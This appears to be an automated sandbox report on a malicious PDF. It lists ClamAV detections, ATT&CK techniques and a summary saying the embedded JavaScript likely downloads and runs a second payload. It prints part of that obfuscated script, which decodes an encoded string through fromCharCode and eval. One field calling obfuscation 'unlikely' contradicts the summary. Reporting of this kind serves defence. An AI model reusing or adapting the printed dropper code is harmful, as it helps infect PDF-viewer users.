MALICIOUS
166
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The PDF contains embedded JavaScript, flagged by multiple heuristics and a machine learning classifier. ClamAV detections indicate it's a known exploit targeting PDF viewers. The embedded JavaScript is heavily obfuscated but appears to be designed to download and execute a secondary payload, as suggested by the 'Pdf.Exploit.Agent-15666' and 'Win.Trojan.Agent-36166' detections.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 3
-
ClamAV: Pdf.Exploit.Agent-15666 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Exploit.Agent-15666
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js6806fc957d8ad76089e221b8b27f182cffb1aa3b6e69ac1dfdc7943b17b6ae13 |
pdf-javascript-stream | PDF /JS object 7 at offset 0x1A5 | 74767 bytes |
|
Detection
ClamAV:
Win.Trojan.Agent-36166
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var zamavajedo = String; gesalutew = zamavajedo['fUYQrUXoJYmYUCUUhYaUrZUCYZYoQXQdYXeQ'.replace(/[XZYUQJ]/g,'')]; cipuqoj = zamavajedo['eXXvUXUaZQlJJJ'.replace(/[XZYUQJ]/g,'')]; function o(w) { if (w=='0') return '0'; else if (w=='1') return 'f'; else if (w=='2') return 'e'; else if (w=='3') return 'd'; else if (w=='4') return 'c'; else if (w=='5') return 'b'; else if (w=='6') return 'a'; else return w.length.toString(16) }; var s = '0 3 0 6 0 ddddddddd dddddd dddddd ccccccc ccccc dddddd 2 cccccc ccc ccccccc, eeee eeeeee ccccccccc cccccc, 1 cccccc 2 cc 0 eeeeee cccccc cccccc ccccccccc eeeeeee dddddddd ccccc 1 eeeeee ddddddddd eeeeeee dddd cc dddddddd ccccccc ccccccccc eeeeee d ccccccc ee eeeeeee ccc eeeeeee 0 dd 4 dd 0 cccccc, 4 cccccc ccccc eeeeee 2 cc eeeeeeeee eeeeeee 5 0 3 0 6 0 eeeeeeeee 0 ddddddddd ccccccc ddddddd cccccc cccccccc dddddd eeeeeeeee dddddd 4 cccccc, ccccc, ee 0 dd cccccccc eeeeeee eeeeeeeee cccccc e ddddddd dd ddddddd ddd eeeeeee 0 cc 2 dddddd, 4 dddddd ddddd eeeeee 2 eeeeee eeeeeee eeeeeee cccc eeeeee dddddddd cc 0, dd 6 cc 0, ccc ee, ee 0 ddd 4 ee 0. Eeeeee 4 dddddd eeeee cccccc 2 dd ddddddddd ddddddd, 5 0 3 0 6 0 eeeeeeeee 0 eeeeeeeee 0 ccccccccc eeeeeee! Eeeeeeeee cccccc e eeeeeee ee ddddddd, ccc ccccccc 0 cc 0 dd 5 ccc 3 ee 0 ccccccc ddddddddd dddddd d eeeeeee ee ddddddd ddd eeeeeee 0 ccc 5 0 3 0 6 0 ddddddddd 0 ccccccccc eeeeeee. 3 0 3 0 6 0 eeeeeeeee 0 eeeeeeeee ccccccc eeeeeeeee cccccc. E ccccccc cc eeeeeee, eee ddddddd 0 cc 0. Ccc 3 dd 0 ddddddd ddddddddd dddddd e ddddddd cc ddddddd eee ccccccc 0 ee 2 ccccccc ddd ddddddd ddddd dddddd ee ddddddd eee ccccccc cccc ddddddd dd dddddd ddddddddd dddddd 2 eeeeee eeeeeee ee dddddddd ccc 0 dd, 4 cc, 0 eeeeee 4 dddddd ddddd cccccc 2 cc 1 ccc ee dd eeeeeeeee, ddd 5 0 3 0 6 0 ddddddddd 0 ddddddddd ddddddd cc cccccc eeeee ccccccc eeee ddddddd ddddd eeeeeee dd eeeeee 2 cc 0, ccccccc ccccccccc eeeeee d eeeeeee cc ddddddd ddd ddddddd 0 ddd 5 0. 3 0 6 0 ddddddddd ddddddd 3 0 3 0 6 0 3. 0 6 0 ddddddddd. Cccccc dddddd ddddddd ccccc cccccc 2. Cccccc ddd eeeeeee eeee dddddd ddddddddd dddddd 1 dddddd 2 ee 0 ccccccc ccccc ddddddd eeee eeeeee ccccccccc eeeeee 4. Eeeee 1 ddddddd 0 ddddddd ee dddddd ccccccccc eeeeee 2 ddddddd. Eeee eeeeee dddddd ee dddddddd cc ccccccccc, eeeeeee 5 0, 3 0 6 0 ddddddddd 0 ddddddddd eeeeeee eeeeee eeeeee e eeeeeee cc ee 0 eeeeeee 0 dddddd d eeeeeee eeeeeeeee. Dddddd, 4 dddddd 1 cccccc d dddddd. Cccc cc 0 eee 3 ee 0 ccccccc, eeeee cccccc 2 eeeeee, eeeee ddddddd ddd eeeeee ccc eeeeee e ddddddd 0 cccccc ccccc cc eeeeeeee ee dd cc ccccc ccccccc ddddd ccc dddd ccc eee eee cccc ddd eee cc ddddd ddddddd eeeee ccc cccc ccc ccc ddd cccc eee ccc cc ccccc! Ccccccc ddddd eee cccc ccc eee ccc cccc ddd ddd ee eeeee ccccccc ddddd eee 0 dddd eeeeee cccc ccccc eeee dd cc ccccc ddddddd, eeeee ccc ddd eee ddd ddd ccccc eeee cc cc ccccc ccccccc ddddd ddd eeeeee eee cccccc dddd, ccc ddd ddddddddd cc ccccc. Ddddddd ccccc ccc cccccccc eee 0 cccc cc eee, ccccccccc dd eeeee? Eeeeeee eeeee eee, dddddddd ccc 0. Eee 0 eee c cc eeeee ccccccc eeeee cccc eeeee cccc cccccc eee ddd ddd eee ee ccccc ccccccc eeeee cccc ccccc eee ee eee eeee eee eee cc ccccc eeeeeee eeeee dddd eeeee cccc, ee dddd cccccc dddd d ee eeeee eeeeeee eeeee. Dddd ccccc ddd cccccccc ccc 0 eee ddddd ee eeeee ddddddd ddddd dddd dddddd cccc. Eeeeee dddd ccccc eeee eee, ee eeeee eeeeeee ddddd eeee. Cccccc cccc eeeeee cccc eeeeee eeee dddddd. Cc ccccc ddddddd, ccccc! Eee dddddddd eeee dd ccc ddddddd cccc eeeeee ee. Ddddd ddddddd ccccc dddd dddd. Cccc dddddd, ccc eeee eeee ccccc cc eeeee ccccccc ddddd eeee eeeee eeee eeeeee cccc ddddd cccc cccccc ee ccccc eeeeeee. Ccccc ddd eeeeee eee cccc dddd ddddd dddd cccccc ee eeeee ddddddd ccccc eeee ddddd ddd eee dddd d cccc cccccc dd ccccc eeeeeee ddddd ddd eeeeeeeee eeee. Dddddd ccc dddddd ddd dddd dd ddddd eeeeeee eeeee eee dddd eee ee cccc, dddddd eee eee ee ddddd eeeeeee ccccc eee eeeeeeeee cccc. Dddddd ccc cccccc eee dddd cc eeeee eeeeeee ccccc. Ccc dddddd eeee eeeee eeee ddddd ddd ddddddd ee. Ddddd ddddddd eeeee eeee ddddd. Eeee dddddd eee 0 eee eee dd ccccc
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.